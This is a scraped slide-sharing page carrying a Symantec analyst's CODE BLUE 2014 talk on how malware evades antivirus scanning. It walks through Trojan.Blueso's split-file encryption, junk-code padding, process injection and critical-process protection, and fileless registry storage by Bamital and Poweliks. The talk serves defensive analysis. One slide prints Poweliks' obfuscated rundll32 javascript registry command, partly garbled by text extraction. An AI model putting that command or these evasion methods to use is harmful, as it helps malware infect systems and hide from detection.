[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
CODE BLUE
 
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
CODE BLUE
 

Mais de CODE BLUE (20)

[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
 
[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten Nohl[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten Nohl
 
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
 
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman [cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
 
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
 
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka [cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
 
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
 
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
 
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
 
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
 
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
 
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
 
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
 

Último

Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
sammart93
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
UK Journal
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Drew Madelung
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
Principled Technologies
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
Enterprise Knowledge
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc
 

Último (20)

Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Tech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfTech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdf
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation Strategies
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 

CODE BLUE 2014 : how to avoid the Detection by Malware by HIROSHI SNINOTSUKA

  • 1. How  malware  avoid  An/  Virus  scanning   Hiroshi  Shinotsuka   Threat  Analysis  Engineer
  • 2. Self-­‐introduc/on   Copyright  ©  2014  Symantec  Corpora;on   2   •  Threat  analysis  engineer  in  Symantec.   •  Analyze  suspicious  file  and  create  An;-­‐Virus  signature   •  Provide  detailed  technical  descrip;on  to  customers  on   demand   •  Publically  provide  malware-­‐related  informa;on  
  • 3. Copyright  ©  2014  Symantec  Corpora;on   3   24  hours  x  365  days  
  • 4. ABacker’s  techniques  to  avoid  detec/ng   1   Store  decryp;on  key  and  data  in   separate  files   2   Large  amount  of    junk  code   3   Process  protec;on   4   Store  malicious  code  outside  of  files   (fileless  malware)   Copyright  ©  2014  Symantec  Corpora;on   4  
  • 5. Trojan.Blueso  detec/on Copyright  ©  2014  Symantec  Corpora;on   5   0   5,000   10,000   15,000   20,000   25,000   30,000   35,000   Trojan.Blueso   August   September   October   November  
  • 6. Trojan.Blueso  file  structure   Copyright  ©  2014  Symantec  Corpora;on   6   RAR  self-­‐extrac/ng    file  13  MB   AutoIt     executable  file   Decryp;on  code   script  file Decryp;on  key   configura;on  file Encrypted  code AutoIt  is  a  programing  language  for  MicrosoW  Windows  plaYorm.  The  AutoIt   syntax  is  very  similar  to  that  of  BASIC  programing  language  and  is  designed  to   automate  the  Windows  GUI. RAR  self-­‐extrac;ng  file  drops  4   files,  then  it  execute  AutoIt   script  
  • 7. Decrypted   code   Bluso  inject  Backdoor.Trojan   Copyright  ©  2014  Symantec  Corpora;on   7   Code   Decryp;on  key   Encrypted  code   Legi;mate    Windows  Process   Decryp;on   Part  of   Decrypted   code   Internet  Explorer   Process   Decry pted   code   AutoIt  executable  
  • 8. Watch  Dog  monitor   Copyright  ©  2014  Symantec  Corpora;on   8   File  deleted   Process  deleted   Create  Process   Inject   Create  File   Trojan.Blueso  make  file/registry/process  again   if  An;virus  delete  it.  
  • 9. ABacker’s  techniques  to  avoid  detec/ng   1   Store  decryp;on  key  and  data  in   separate  files   2   Large  amount  of    junk  code   3   Process  protec;on   4   Store  malicious  code  outside  of  files   (fileless  malware)   Copyright  ©  2014  Symantec  Corpora;on   9  
  • 10. Tradi/onal  sample   Copyright  ©  2014  Symantec  Corpora;on   10   Packer  /  Self  update   •  Harder  to  detect  encrypted  files.   •  Tradi;onal  sample  stored  all  informa;on  in  single  file. Code   Decryp;on  key   Encrypted   code Code   Decrypted   malicious  code  
  • 11. New  technique  to  avoid  detec/on   Copyright  ©  2014  Symantec  Corpora;on   11   Tradi;onally  malware  saved  decrypted  image  to  a  file  and  executed.  An;virus   scanner  detects  malware  when  malware  saved  it  decrypted  image  onto  the   disk.   New  technique  is  to  inject  decrypted  image  to  a  new  running  process  and   executes  in  order  to  avoid  detec;on  by  file  scan.   Decrypted   malicious  code   Legi;mate    Windows  Process  Decrypt  in  memory   Decrypted   malicious  code  Code   Decryp;on  key   Encrypted  code AutoIt  executable  
  • 12. File  detail   Copyright  ©  2014  Symantec  Corpora;on   12   Code   Decryp;on  key   Encrypted  code
  • 13. An;Virus  scanner  scans  each  file.   Why  aBacker  split  malware  into  four  separate  files   Copyright  ©  2014  Symantec  Corpora;on   13   AutoIt  executable   Decryp;on  code   Decryp;on  key   Seeng  file Encrypted  code Scan   Scan   Scan   Scan  
  • 14. What  does  this  mean?   •  Hiding  malicious  code  by  encryp;ng   •  Store  code,  decryp;on  key,  encrypted  code  in  separate  files.   •  An;virus  scanner  can’t  determine  ‘encrypted  code’  as  malicious   file.   •  An;virus  scanner  can’t  detect  the  file  without  understanding   rela;onships  between  mul;ple  files.   Copyright  ©  2014  Symantec  Corpora;on   14  
  • 15. ABacker’s  techniques  to  avoid  detec/ng   1   Store  decryp;on  key  and  data  in   separate  files   2   Large  amount  of    junk  code   3   Process  protec;on   4   Store  malicious  code  outside  of  files   (fileless  malware)   Copyright  ©  2014  Symantec  Corpora;on   15  
  • 16. Code(Beginning  of  file)   Copyright  ©  2014  Symantec  Corpora;on   16   I  TAB  character  is  replaced  with  1  byte  string   You  only  see  junk  comment  lines  !  
  • 17. Code  (Sample  1)   Copyright  ©  2014  Symantec  Corpora;on   17  
  • 18. Code  (Sample  2)   Copyright  ©  2014  Symantec  Corpora;on   18  
  • 19. Code   Copyright  ©  2014  Symantec  Corpora;on   19   Finally,  at  line  23670,  16MB  in  size,  important  code  is  reached.   87476  lines  of  AutoIt  script  codes.   Only  900  lines  without  comment  lines.   Only  1%  important  codes.
  • 20. An/virus  scan  method   Copyright  ©  2014  Symantec  Corpora;on   20   •  An;virus  scanner  needs  to  have  balance  between  detec;on  and   performance   •  An;virus  scanner  first  determines  file  types  and  starts  file  scan   based  on  the  detected  file  type.   Executable  file ZIP  file JPEG  file
  • 21. No  special  file  structure  in  text  file/script  file. Copyright  ©  2014  Symantec  Corpora;on   21   Script  files  have  no  file-­‐header,  which  means  the  files  have  no  special   file  structure.   An;virus  scanner  needs  to  run  a  par;al  scan  and  determine  what  the   file  is.   Very  difficult  to  keep  scan  performance  if  malicious  script  has  so  many   comment/junk  code.
  • 22. ABacker’s  techniques  to  avoid  detec/ng   1   Store  decryp;on  key  and  data  in   separate  files   2   Large  amount  of    junk  code   3   Process  protec;on   4   Store  malicious  code  outside  of  files   (fileless  malware)   Copyright  ©  2014  Symantec  Corpora;on   22  
  • 23. How  does  Blueso  start  and  protect  itself?   Copyright  ©  2014  Symantec  Corpora;on   23   Code   Decryp;on  key   Encrypted  code Legi;mate    Windows  Process   Decryp;on   Internet  Explorer   process   Malware  !! Malware  ?? What  is  wrong  ?? AutoIt   executable  
  • 24. Process  protec/on  mechanism   Copyright  ©  2014  Symantec  Corpora;on   24   1)  Terminate  Internet  Explorer   -­‐>  Malicious  code  injected  into  Legi;mate  Windows  Process  is  executed  again   2)  Terminate  Legi;mate  Windows  Process   -­‐>  Running  script  on  AutoIt  execute  again   3)  Terminate  AutoIt  ?   -­‐>  Handle  AutoIt  executable  as  an  essen;al  process  for  Windows    system  by  using   undocumented  API  NtSetInforma;onProcess   As  soon  as  AutoIT  is  terminated,  Windows  determines  it  as  unrecoverable  cri;cal   problem.   -­‐>  Blue  Screen  Of  Death  !!  
  • 25. Blue  Screen  Of  Death   Copyright  ©  2014  Symantec  Corpora;on   25  
  • 26. ABacker’s  techniques  to  avoid  detec/ng   1   Store  decryp;on  key  and  data  in   separate  files   2   Large  amount  of    junk  code   3   Process  protec;on   4   Store  malicious  code  outside  of  files   (fileless  malware)   Copyright  ©  2014  Symantec  Corpora;on   26  
  • 27. Example  of  malware  store  code/data  in  irregular   place(Bamital)   Copyright  ©  2014  Symantec  Corpora;on   27   Set  registry  entry  to  start  a  code  when  windows  restarts.   HKEY_LOCAL_MACHINEsystemCurrentControlSetControlSession  Manager AppCertDlls"AppSecDll"  =   "%USER_Profile%Local  SeengsApplica;on  DataWindows  Serverxblscp.dll“   Because  of  analysis  already  performed,  xblscp.dll  is  determined  as  a  malicious  file.   Stricktly  speaking,  does  this  file  have  malicious  code  in  it?  
  • 28. Example  of  malware  store  code/data  in  irregular  place   (Bamital)2   Copyright  ©  2014  Symantec  Corpora;on   28   How  it  works   •  Allocate  memory   •  Store  data  from  registry  to  the  allocated  memory •  Call  the  allocated  memory An;virus  scanner  doe  not  know  data  rule.  The  data  is  wriven  in   registry.   Another  malware  uses  same  technique  by  file.
  • 29. Example  of  malware  store  code/data  in  irregular   place(Poweliks)   Copyright  ©  2014  Symantec  Corpora;on   29   Trojan.Poweliks  writes  a  Windows  Powershell  script  to  registry. You  can  find  this  registry  entry  may  execute  encrypted  java  script.   Encrypted  code  that  should  be  decrypted  in  different  registry  entry. HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{73E709EA-­‐5D93-­‐4B2E-­‐ BBB0-­‐99B7938DA9E4}LocalServer32(Default)  =   rundll32.exe  javascript:"..mshtml,RunHTMLApplica;on  ";eval("epdvnfou/xsjuf) (=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/ S~Se)(ILDS]]dmtje]]|84f81:.6e:4.5c3f.ccc1.::c8:49eb:f5~]]mpdbmYswfs43]]b(*, (=0tdsjqu?(*".replace(/./g,func;on(_){return %20String.fromCharCode(_.charCodeAt()-­‐1);}))   "a"="#@~^k4QAAA==n{F+2i@#@&l{x APzmOk7+p6(L+1O`r ?1.rwDRUtnVsE*i@#@  
  • 30. Conclusion   Copyright  ©  2014  Symantec  Corpora;on   30   •  Avackers  discover  new  techniques  every  day.   •  Avackers  employ  techniques  to  make  malware  removal  difficult   •  File  based  scanning  is  no  longer  effec;ve   •  Mul;-­‐layered  security  is  becoming  more  important  
  • 31. &  Q   A   Copyright  ©  2014  Symantec  Corpora;on   31  
  • 32. Thank  you!   Copyright  ©  2014  Symantec  Corpora/on.  All  rights  reserved.  Symantec  and  the  Symantec  Logo  are  trademarks  or  registered  trademarks  of  Symantec  Corpora;on  or  its  affiliates   in  the  U.S.  and  other  countries.    Other  names  may  be  trademarks  of  their  respec;ve  owners.   This  document  is  provided  for  informa;onal  purposes  only  and  is  not  intended  as  adver;sing.    All  warran;es  rela;ng  to  the  informa;on  in  this  document,  either  express  or   implied,  are  disclaimed  to  the  maximum  extent  allowed  by  law.    The  informa;on  in  this  document  is  subject  to  change  without  no;ce.   Hiroshi  Shinotsuka  

Notas do Editor

  1. Tip: simple SEO adjustments can make your presentation more discoverable. Read this PDF for best practices:  http://seo.ges.symantec.com/seo-best-practices-for-file-optimization.pdf
  2. AutoItのスクリプトファイル 32MB を Windows に備わっているメモ帳で読み込むには4秒かかった 例えば、ファイルをダブルクリックして実行しようとしたときに、実行までに4秒かかるとしたら、、、待てません!